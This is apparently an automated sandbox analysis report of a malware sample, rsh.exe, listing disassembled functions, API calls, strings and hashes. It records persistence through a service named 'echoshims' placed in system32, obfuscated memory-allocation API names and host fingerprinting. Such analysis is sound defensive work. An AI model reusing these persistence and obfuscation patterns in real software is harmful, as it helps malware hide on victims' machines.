_snwprintf.NTDLL ref: 002110D6
CreateEventW.KERNEL32(?,00000001,?,?), ref: 002110F1
SetEvent.KERNEL32(00000000,?,00000001,?,?), ref: 002110FE
CloseHandle.KERNEL32(00000000), ref: 00211105
CloseHandle.KERNEL32(00000000), ref: 00211111

Strings

", xrefs: 002110BA

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CloseEventHandle$Create_snwprintf
String ID: "
API String ID: 2675716504-2280192692
Opcode ID: 364ec93b29b9d71a5544f20ffb3f9956e05a0afe650d1c76a95909583da4b9c5
Instruction ID: 72e58e3737274d762d9c56ee76979c1435cf640ab8fb7653d84dc01582644217
Opcode Fuzzy Hash: 364ec93b29b9d71a5544f20ffb3f9956e05a0afe650d1c76a95909583da4b9c5
Instruction Fuzzy Hash: 75F0B471910520B7D7327BA0EC0CFEE7679DF56700F040190FA0A97241DB348AA18BA5

Uniqueness

Uniqueness Score: 100.00%

Function 0021F574, Relevance: 9.0, APIs: 6, Instructions: 22fileCOMMON

APIs

MapViewOfFile.KERNEL32 ref: 0021F574
GetFileSize.KERNEL32(?,00000000), ref: 0021F583
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 0021F58D
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 0021F599
CloseHandle.KERNEL32 ref: 0021F5A0
CloseHandle.KERNEL32 ref: 0021F5A8

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: 1b7e926b2d9487f4e24a35eb9b9e1c23bb52356aa952bee86ce65e99bb7aadbf
Instruction ID: e026bbf573dab2ac90192c3c386b396b35daab8f51e1ca988f7196b6e9137b57
Opcode Fuzzy Hash: 1b7e926b2d9487f4e24a35eb9b9e1c23bb52356aa952bee86ce65e99bb7aadbf
Instruction Fuzzy Hash: 34E0EC72200601BFE3213FE5FD8CBAE3AA8FB59B03F442165F605D11A0CB644A038F65

Uniqueness

Uniqueness Score: 0.01%

Function 00217C6A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 147libraryUNIQUE

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00218106

Strings

ra:|, xrefs: 00218007
:yd(, xrefs: 00218076
.", xrefs: 00217F9E
Y<o, xrefs: 00217D64

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: ."$:yd($ra:|$Y<o
API String ID: 1029625771-69255199
Opcode ID: 2ad0ec340d862e81e26520dba3e0f82dd24bca66d992164a9ed6e268032ccfa4
Instruction ID: 502f06ddeab682184bcff801b5ed28d015807f74a5476221aa4ee0355106908e
Opcode Fuzzy Hash: 2ad0ec340d862e81e26520dba3e0f82dd24bca66d992164a9ed6e268032ccfa4
Instruction Fuzzy Hash: 28B1B7B4C59369DBDB20DF829A817DDBA71FB16300F6081C8D5993B315DB740A86CF86

Uniqueness

Uniqueness Score: 100.00%

Function 0021CCB0, Relevance: 7.5, APIs: 5, Instructions: 37synchronizationCOMMON

APIs

WaitForSingleObject.KERNEL32(00000000), ref: 0021CCC3
SignalObjectAndWait.KERNEL32(000000FF,00000000), ref: 0021CCF6
ResetEvent.KERNEL32 ref: 0021CD0D
ReleaseMutex.KERNEL32 ref: 0021CD1B
CloseHandle.KERNEL32 ref: 0021CD27

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: ObjectWait$CloseEventHandleMutexReleaseResetSignalSingle
String ID:
API String ID: 3756552044-0
Opcode ID: 0f01b7e3d09fcff0b6f8f84c1526cbc7df05f461a65432ef83c22671972947c6
Instruction ID: dac7365209f1d7d6120e189774a9906bc84df3aa6a9f66395f36e8847ca5c3e6
Opcode Fuzzy Hash: 0f01b7e3d09fcff0b6f8f84c1526cbc7df05f461a65432ef83c22671972947c6
Instruction Fuzzy Hash: 61F0E738690112AADB313FA2BD0DB993AA4AB24351B256231B904D11F5EA1188A2DAA1

Uniqueness

Uniqueness Score: 0.01%

Function 0021F5CA, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60UNIQUE

APIs

GetComputerNameW.KERNEL32(?), ref: 0021F5D6
WideCharToMultiByte.KERNEL32(00000000,00000400,?,000000FF,?,00000010,00000000,00000000), ref: 0021F61D

Strings

X, xrefs: 0021F665
`7", xrefs: 0021F5F8

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: ByteCharComputerMultiNameWide
String ID: X$`7"
API String ID: 4013585866-3969999246
Opcode ID: 9b5fd170f651f8503df328c89e9e1bad56a5a8079d14784a20259d700816811e
Instruction ID: 8dfb0fba9430a4e5d3ec9fceea186d3c924b2de8f80540fc687c77408fee4e58
Opcode Fuzzy Hash: 9b5fd170f651f8503df328c89e9e1bad56a5a8079d14784a20259d700816811e
Instruction Fuzzy Hash: 07115C7096518AAADF60DBA4AF05BEA77EC9B22344F200035E271F10F1D6604DE78B16

Uniqueness

Uniqueness Score: 100.00%

Function 0021D057, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52COMMON

APIs

_snwprintf.NTDLL ref: 0021D073
GetModuleHandleW.KERNEL32(00000000), ref: 0021D0B0
GetModuleHandleW.KERNEL32(00000000,00000000), ref: 0021D0D0

Strings

0, xrefs: 0021D096

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: HandleModule$_snwprintf
String ID: 0
API String ID: 960185367-4108050209
Opcode ID: 65a7eb18ea1371a54e63d9d97a5683208406193821ab726e1193fce4cdb6830b
Instruction ID: 04a32455f182b22cc8144f34e58811c80d3f1d8575a1541bc1792f457d7598e0
Opcode Fuzzy Hash: 65a7eb18ea1371a54e63d9d97a5683208406193821ab726e1193fce4cdb6830b
Instruction Fuzzy Hash: 2E116571950218BBEB21AFD0EC19FED76B8EB04740F204059F705BA180DB706695CF59

Uniqueness

Uniqueness Score: 0.03%

Function 0021FA30, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29stringCOMMON

APIs

lstrcpyW.KERNEL32(?,00227748), ref: 0021FA3B
lstrlenW.KERNEL32(?,?,00227748), ref: 0021FA42
GetTickCount.KERNEL32(?,?,00227748), ref: 0021FA54

Strings

x, xrefs: 0021FA77

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CountTicklstrcpylstrlen
String ID: x
API String ID: 974621299-2363233923
Opcode ID: afd9278559d7ec2cac75e9907003d43ea3a51c59f020430b61f21656d31a5762
Instruction ID: 25dfc2393306cf389ded80d106bbaa68c2574496d71b0bf40a7760844229bd5b
Opcode Fuzzy Hash: afd9278559d7ec2cac75e9907003d43ea3a51c59f020430b61f21656d31a5762
Instruction Fuzzy Hash: E4F055B3A15354BBC3206FE0ECC850637A9EF50352B052070EC05DB212DF70C84187E0

Uniqueness

Uniqueness Score: 0.02%

Function 0021F42E, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 28UNIQUE

APIs

_snwprintf.NTDLL ref: 0021F485

Strings

0;", xrefs: 0021F43B
0r", xrefs: 0021F447
P9", xrefs: 0021F464

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: _snwprintf
String ID: 0;"$0r"$P9"
API String ID: 3988819677-3477465805
Opcode ID: 190386b6381cf8f68849bc349cac4004f7dd291030d65857ef12b71ce7249358
Instruction ID: 7113fe5952c56da940f9fa3fbc08a5b48be092fbe75cffab5112b95a890b0736
Opcode Fuzzy Hash: 190386b6381cf8f68849bc349cac4004f7dd291030d65857ef12b71ce7249358
Instruction Fuzzy Hash: 38E0126477817173921572E43863AEE50828B96790B501274FB466F3C2C8B41DB247DE

Uniqueness

Uniqueness Score: 100.00%

Function 0021D119, Relevance: 6.0, APIs: 4, Instructions: 38synchronizationCOMMON

APIs

GetTickCount.KERNEL32 ref: 0021D119
GetTickCount.KERNEL32(?,00000000), ref: 0021D127
GetTickCount.KERNEL32(?,00000000), ref: 0021D138
WaitForSingleObject.KERNEL32(00000000), ref: 0021D18C

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CountTick$ObjectSingleWait
String ID:
API String ID: 2051767920-0
Opcode ID: 2c673118ca98f20a757b15aeb62a59b1b3e7024ae4230aa45eca506f39bffd2e
Instruction ID: 2a5b2d786a30caa418364a4380c17f6995be663e0087a2d2f98f1ac010e5c8bc
Opcode Fuzzy Hash: 2c673118ca98f20a757b15aeb62a59b1b3e7024ae4230aa45eca506f39bffd2e
Instruction Fuzzy Hash: 5B0169B2904601FBE7206BE0FC4DBAE3ABDAB04306F51A125F116D51A0DBB494829F50

Uniqueness

Uniqueness Score: 0.03%

Function 0021FDCE, Relevance: 6.0, APIs: 4, Instructions: 33COMMON

APIs

_snwprintf.NTDLL ref: 0021FDEB
CloseHandle.KERNEL32(?), ref: 0021FE18
CloseHandle.KERNEL32(?), ref: 0021FE21
CloseHandle.KERNEL32(?), ref: 0021FE2A

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CloseHandle$_snwprintf
String ID:
API String ID: 2398838028-0
Opcode ID: 3701b567932c47434786f3e3156db706ba7e80ebe4fce2a6c67adf55a368cfea
Instruction ID: 5562f385b6d6d3a39549a633686f967c70818b07d42314fc1e657f38b42069e8
Opcode Fuzzy Hash: 3701b567932c47434786f3e3156db706ba7e80ebe4fce2a6c67adf55a368cfea
Instruction Fuzzy Hash: 82F03671910019ABDF10ABE0FD499EE7779EF19311F4005A5F605A6051DB318B618F91

Uniqueness

Uniqueness Score: 0.01%

Function 0021FCA0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32stringCOMMON

APIs

lstrlenW.KERNEL32 ref: 0021FCB5
GetTickCount.KERNEL32 ref: 0021FCC7

Strings

x, xrefs: 0021FCEA

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: CountTicklstrlen
String ID: x
API String ID: 2992449761-2363233923
Opcode ID: c84a50b68ede517a48549a82926ba612fa6c65a292354083d343e1e691436085
Instruction ID: 47ee6170e625545f191ae8c1607425c4dde4cf42ea3db4dfc7d51dc84ac8af65
Opcode Fuzzy Hash: c84a50b68ede517a48549a82926ba612fa6c65a292354083d343e1e691436085
Instruction Fuzzy Hash: 12F0ECB2614315BBE7206FE0EC88B063699EF40752F155070FA09EF292DBB4C80187E0

Uniqueness

Uniqueness Score: 0.02%

Function 0021F4B3, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32fileUNIQUE

APIs

_snwprintf.NTDLL ref: 0021F4FF
DeleteFileW.KERNEL32(?), ref: 0021F516

Strings

P9", xrefs: 0021F4DA

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: DeleteFile_snwprintf
String ID: P9"
API String ID: 366827715-1209613308
Opcode ID: f0284a1aac4ba682781a8899f9c2165018413af16e5931cf19254d8518577bf8
Instruction ID: 8c315d1e4006b9eb47fa0cf7d0ebaccf0b495c951c30aad2aaf0fdcf35054bc7
Opcode Fuzzy Hash: f0284a1aac4ba682781a8899f9c2165018413af16e5931cf19254d8518577bf8
Instruction Fuzzy Hash: 8FF082B2A1016867CB20F7A0AC59AEE72A99B55300F0006E5FA5697242DE744AF14FD9

Uniqueness

Uniqueness Score: 100.00%

Function 0021F840, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19UNIQUE

APIs

GetTempPathW.KERNEL32 ref: 0021F840
GetTempFileNameW.KERNEL32(?,?,?,?), ref: 0021F850

Strings

@u", xrefs: 0021F85C

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: Temp$FileNamePath
String ID: @u"
API String ID: 3285503233-150182021
Opcode ID: 4fedaf4febb185db30ec615c987977090e6b14d972f0ba220c0ba24432de8bca
Instruction ID: d23cc53b1e2f19a655d91d348f25ed902eecb38565ab122db5f0ba92ec24f2bd
Opcode Fuzzy Hash: 4fedaf4febb185db30ec615c987977090e6b14d972f0ba220c0ba24432de8bca
Instruction Fuzzy Hash: AAD05B7071522D67CB306BE06C4D9FBB7ACDF15391B0001E1BE1DD2511DD3489B18BA1

Uniqueness

Uniqueness Score: 100.00%

Function 00215EE5, Relevance: 5.1, APIs: 4, Instructions: 82COMMON

APIs

memset.NTDLL ref: 00215EEE
memset.NTDLL ref: 00215F7D
memset.NTDLL ref: 00215F93
memset.NTDLL ref: 00215FA9

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 91a5c23a98d0fe62885d22498d7cf11156a02172e336d4e36f579c25db157898
Instruction ID: f8e226515f1477e1698d0709f857caa7573ed3b2836aa702c1e453f209fed920
Opcode Fuzzy Hash: 91a5c23a98d0fe62885d22498d7cf11156a02172e336d4e36f579c25db157898
Instruction Fuzzy Hash: A631D6B1E10515EBDB08CF90D9457EDBBF4FF99305F2441A9E506A7A80D374A6A1CF80

Uniqueness

Uniqueness Score: 0.00%

Function 00215D95, Relevance: 5.1, APIs: 4, Instructions: 79COMMON

APIs

memset.NTDLL ref: 00215DA8
memset.NTDLL ref: 00215F7D
memset.NTDLL ref: 00215F93
memset.NTDLL ref: 00215FA9

Memory Dump Source

Source File: 00000012.00000002.1053018933.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000012.00000002.1053007115.00210000.00000004.sdmp
Associated: 00000012.00000002.1053059304.00221000.00000002.sdmp
Associated: 00000012.00000002.1053070762.00222000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_210000_rsh.jbxd

Similarity

API ID: memset
String ID:
API String ID: 2221118986-0
Opcode ID: 74a51ef798cd34099a4a889a295d997acda9cf247f67ab085ddb36d27f04f703
Instruction ID: 7808b8193ba269f77690a6834ecacd61a50b001a560f3969063e0043ef128750
Opcode Fuzzy Hash: 74a51ef798cd34099a4a889a295d997acda9cf247f67ab085ddb36d27f04f703
Instruction Fuzzy Hash: 453150B2E10F82E7E3058F64D805BE4B770FBEA300F205356E4D595A42EB78A6A5C7D0

Uniqueness

Uniqueness Score: 0.00%

Analysis Process: rsh.exe PID: 1220 Parent PID: 2616rsh.exeUNIQUE

Execution Graph

Execution Coverage:	8.6%
Dynamic/Decrypted Code Coverage:	94.8%
Signature Coverage:	15.4%
Total number of Nodes:	637
Total number of Limit Nodes:	30

Executed Functions

Function 001F1FF0, Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 65
memorynativeUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL ref: 001F202E
NtAllocateVirtualMemory.NTDLL ref: 001F20B5

Strings

YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY, xrefs: 001F201B
l, xrefs: 001F2071
A, xrefs: 001F2069
w, xrefs: 001F2065
l, xrefs: 001F206D
l, xrefs: 001F2075
r, xrefs: 001F2055
Z, xrefs: 001F2061
y, xrefs: 001F2059

Memory Dump Source

Source File: 00000013.00000002.1066818448.001F0000.00000040.sdmp, Offset: 001F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1f0000_rsh.jbxd

Similarity

API ID: AllocateMemoryVirtualmemcpy
String ID: A$YYYYYocateVirtuaYMemoYYYYYYYYYYYYYYY$Z$l$l$l$r$w$y
API String ID: 2505947351-868024915
Opcode ID: 735e7e2287646a26ed7818f4302e33c56cdf954be12e139933e0dda6558f4a94
Instruction ID: 8d1923df36a5eaeaa19fad6fadc0819baa57459a94f1de8c5586326b3e282ca0
Opcode Fuzzy Hash: 735e7e2287646a26ed7818f4302e33c56cdf954be12e139933e0dda6558f4a94
Instruction Fuzzy Hash: 103105B0D04348CBDB14CFA9D44469DBFB1AF89314F24C19DD858AB392C77A994ACFA1

Uniqueness

Uniqueness Score: 100.00%

Function 001F1EE0, Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 73
nativeUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

memcpy.NTDLL ref: 001F1F41
NtProtectVirtualMemory.NTDLL ref: 001F1FC0

Strings

M, xrefs: 001F1F6F
V, xrefs: 001F1F6B
Z, xrefs: 001F1F63
yyProtectairtual emory, xrefs: 001F1F03
w, xrefs: 001F1F67
@, xrefs: 001F1F56

Memory Dump Source

Source File: 00000013.00000002.1066818448.001F0000.00000040.sdmp, Offset: 001F0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_1f0000_rsh.jbxd

Similarity

API ID: MemoryProtectVirtualmemcpy
String ID: @$M$V$Z$w$yyProtectairtual emory
API String ID: 2440499307-3039725267
Opcode ID: 5da0d1ac30c451124eea1265b36d9a08683ddfe842000dafe165879d06a4b073
Instruction ID: 8f782fe4863ffa8b5ccfb10418b3218b4cdc57bb35d78b2609c19a359c834446
Opcode Fuzzy Hash: 5da0d1ac30c451124eea1265b36d9a08683ddfe842000dafe165879d06a4b073
Instruction Fuzzy Hash: 1931CFB5D04258CBDB10CF69C980B9DBBF0BB48314F2085AEE968AB342D7359945CF51

Uniqueness

Uniqueness Score: 100.00%

Function 0021D119, Relevance: 13.5, APIs: 9, Instructions: 38
windowsynchronizationtimeCOMMON

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0021D119
SetTimer.USER32(?,00000000), ref: 0021D121
GetTickCount.KERNEL32(?,00000000), ref: 0021D127
GetTickCount.KERNEL32(?,00000000), ref: 0021D138
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0021D15E
TranslateMessage.USER32(?), ref: 0021D174
DispatchMessageW.USER32(?), ref: 0021D17E
WaitForSingleObject.KERNEL32(00000000), ref: 0021D18C
DestroyWindow.USER32 ref: 0021D1AE

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CountMessageTick$DestroyDispatchObjectSingleTimerTranslateWaitWindow
String ID:
API String ID: 1391006589-0
Opcode ID: 327df157f4669cb9f1cac0b1876de508e7cf5fb07aafbc118e9e2661f2adb31a
Instruction ID: e2b6427ffeefe628cdbb5190738aa460709d31f4369f9cfc49ccd604ad6aacf7
Opcode Fuzzy Hash: 327df157f4669cb9f1cac0b1876de508e7cf5fb07aafbc118e9e2661f2adb31a
Instruction Fuzzy Hash: 5C0169B2914601FBE7206BE0FC4DBAE3AB9AB04306F51A125F116D11A0DBB484529F54

Uniqueness

Uniqueness Score: 0.03%

Function 0021F959, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53
serviceUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

_snwprintf.NTDLL ref: 0021F974
CreateServiceW.ADVAPI32(?,echoshims,echoshims,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0021F9A8
CloseServiceHandle.ADVAPI32(?,?,echoshims,echoshims,00000012,00000010,00000002,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0021FA0C

Strings

echoshims, xrefs: 0021F99D, 0021F9A2
C:\Windows\system32\echoshims.exe, xrefs: 0021F968

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Service$CloseCreateHandle_snwprintf
String ID: C:\Windows\system32\echoshims.exe$echoshims
API String ID: 2094473374-32405276
Opcode ID: a75da1cccd8a1f36994ccf4c4c1d8b74d511104b379acfc6d5d3112ba54c54dd
Instruction ID: 055a0f65108e52ee0f2430528d260dd525caae351a459550f75cf26c3720ad68
Opcode Fuzzy Hash: a75da1cccd8a1f36994ccf4c4c1d8b74d511104b379acfc6d5d3112ba54c54dd
Instruction Fuzzy Hash: 1601497137432572D6306BD07C86FFE62988B25B00F100272FF05A61C2DEF059715691

Uniqueness

Uniqueness Score: 100.00%

Function 0021F71D, Relevance: 4.5, APIs: 3, Instructions: 45serviceCOMMON

APIs

EnumServicesStatusExW.ADVAPI32 ref: 0021F71D
GetTickCount.KERNEL32 ref: 0021F72B
OpenServiceW.ADVAPI32(?,?,00000001), ref: 0021F75B

Part of subcall function 00211830: GetProcessHeap.KERNEL32(00000000,?,0021CE77), ref: 00211833
Part of subcall function 00211830: HeapFree.KERNEL32(00000000), ref: 0021183A

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: Heap$CountEnumFreeOpenProcessServiceServicesStatusTick
String ID:
API String ID: 1772836470-0
Opcode ID: 768c60e8d9737e25868ad8abef822f31e126a7cb6eb4b0c17d701c4a6ee0416c
Instruction ID: e856f07ec20c69266a392bb35a1e3b0374cddf53939cbabd108f7eb9fe41cb1b
Opcode Fuzzy Hash: 768c60e8d9737e25868ad8abef822f31e126a7cb6eb4b0c17d701c4a6ee0416c
Instruction Fuzzy Hash: B001B172E2021BCBCF209FA8D9C15EDF7F4BB28344F25012AD915B7290D77598E28B90

Uniqueness

Uniqueness Score: 0.03%

Function 002172DA, Relevance: 30.0, APIs: 1, Strings: 16, Instructions: 266
libraryUNIQUE

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNEL32(00000000), ref: 00217C1C

Strings

'/~, xrefs: 0021744C
~o>, xrefs: 0021794C
e, xrefs: 00217B3E
"C#}, xrefs: 002179EC
$w 4, xrefs: 00217A64
3@[, xrefs: 00217A32
P&", xrefs: 00217C05
JIx, xrefs: 0021756E
/@n, xrefs: 00217A28
tcZ], xrefs: 0021769A
9I;\, xrefs: 00217820
/d4, xrefs: 00217B04
d;, xrefs: 002177BC
wk#m, xrefs: 002175D2
F2`?, xrefs: 00217BD1
LP 3, xrefs: 002178DE

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: LibraryLoad
String ID: "C#}$$w 4$/@n$/d4$3@[$9I;\$F2`?$JIx$LP 3$P&"$tcZ]$wk#m$~o>$d;$'/~$e
API String ID: 1029625771-3323411440
Opcode ID: a9363f65e1913deb4b020edac3acda33aacc3adbf3d2166581b98d00b0d95ea0
Instruction ID: 7223aa333e4c2ba922a3163113445dd9d420b0e2c703e1847a36ade23e0ae4e2
Opcode Fuzzy Hash: a9363f65e1913deb4b020edac3acda33aacc3adbf3d2166581b98d00b0d95ea0
Instruction Fuzzy Hash: 4212A7B48463698FDB71DF8299897CDBA74BB12744F6086C8C19D3B214CB750B86CF85

Uniqueness

Uniqueness Score: 100.00%

Function 0021CE91, Relevance: 10.6, APIs: 7, Instructions: 93
COMMON

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 0021CE9E
SetEvent.KERNEL32 ref: 0021CFF1

Part of subcall function 0021FAE0: lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\rsh.exe,C:\Windows\system32\echoshims.exe,?,0021CEE7), ref: 0021FB13

GetTickCount.KERNEL32 ref: 0021CEEB
GetTickCount.KERNEL32 ref: 0021CEFC
GetTickCount.KERNEL32 ref: 0021CF8D
GetTickCount.KERNEL32 ref: 0021CF9E
GetTickCount.KERNEL32 ref: 0021CFC8

Part of subcall function 0021CD40: GetTickCount.KERNEL32 ref: 0021CD4B
Part of subcall function 0021CD40: lstrlen.KERNEL32(00000000), ref: 0021CD75
Part of subcall function 0021CD40: GetTickCount.KERNEL32 ref: 0021CE46

Memory Dump Source

Source File: 00000013.00000002.1066849264.00211000.00000020.sdmp, Offset: 00210000, based on PE: true

Associated: 00000013.00000002.1066840431.00210000.00000004.sdmp
Associated: 00000013.00000002.1066863774.00221000.00000002.sdmp
Associated: 00000013.00000002.1066870329.00222000.00000004.sdmp
Associated: 00000013.00000002.1066878234.00227000.00000004.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_210000_rsh.jbxd

Similarity

API ID: CountTick$Eventlstrcmpilstrlen
String ID:
API String ID: 637603502-0
